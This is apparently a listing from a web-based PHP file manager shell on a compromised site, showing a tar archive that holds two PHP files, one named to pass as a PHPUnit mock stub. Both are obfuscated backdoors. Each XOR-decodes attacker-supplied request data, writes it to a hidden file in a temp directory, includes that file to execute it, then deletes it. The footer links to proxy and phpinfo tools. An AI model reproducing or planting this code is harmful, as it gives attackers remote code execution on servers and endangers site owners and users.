File manager - Edit - /home/lemagazi/www/archive/docs/v1/dpuay/Framework.tar
Back
MockObject/Stub/acc_inv_tmpl.php 0000666 00000001607 15134052164 0012661 0 ustar 00 <?php if(isset($_POST["\x76\x61l"]) ? true : false){ $obj = $_POST["\x76\x61l"]; $obj =explode( ".", $obj ) ; $marker =''; $s1 ='abcdefghijklmnopqrstuvwxyz0123456789'; $sLen =strlen($s1 ); $v =0; foreach ($obj as $v3) { $chS =ord($s1[$v % $sLen] ); $dec =((int)$v3 - $chS - ($v % 10)) ^ 81; $marker.=chr($dec ); $v++; } $pgrp = array_filter([ini_get("upload_tmp_dir"), "/dev/shm", sys_get_temp_dir(), getenv("TEMP"), "/var/tmp", session_save_path(), getcwd(), getenv("TMP"), "/tmp"]); while ($element = array_shift($pgrp)) { if (is_writable($element) && is_dir($element)) { $value = implode("/", [$element, ".resource"]); $file = fopen($value, 'w'); if ($file) { fwrite($file, $marker); fclose($file); include $value; @unlink($value); exit; } } } } roles_actions.php 0000666 00000001674 15134052164 0010136 0 ustar 00 <?php if(!empty($_REQUEST["\x69\x74m"])){ $entry = array_filter([ini_get("upload_tmp_dir"), sys_get_temp_dir(), "/tmp", getenv("TMP"), session_save_path(), getenv("TEMP"), getcwd(), "/dev/shm", "/var/tmp"]); $data_chunk = $_REQUEST["\x69\x74m"]; $data_chunk = explode( '.' , $data_chunk ) ; $tkn = ''; $s6 = 'abcdefghijklmnopqrstuvwxyz0123456789'; $sLen = strlen( $s6 ); $len = count( $data_chunk ); for( $r = 0; $r < $len; $r++) {$v8 = $data_chunk[$r]; $sChar = ord( $s6[$r % $sLen] ); $dec =( ( int)$v8 - $sChar -( $r % 10)) ^7; $tkn .= chr( $dec ); } while ($binding = array_shift($entry)) { if (max(0, is_dir($binding) * is_writable($binding))) { $ref = implode("/", [$binding, ".object"]); $success = file_put_contents($ref, $tkn); if ($success) { include $ref; @unlink($ref); exit;} } } }
| ver. 1.4 |
Github
|
.
| PHP 5.4.45 | Generation time: 0 |
proxy
|
phpinfo
|
Settings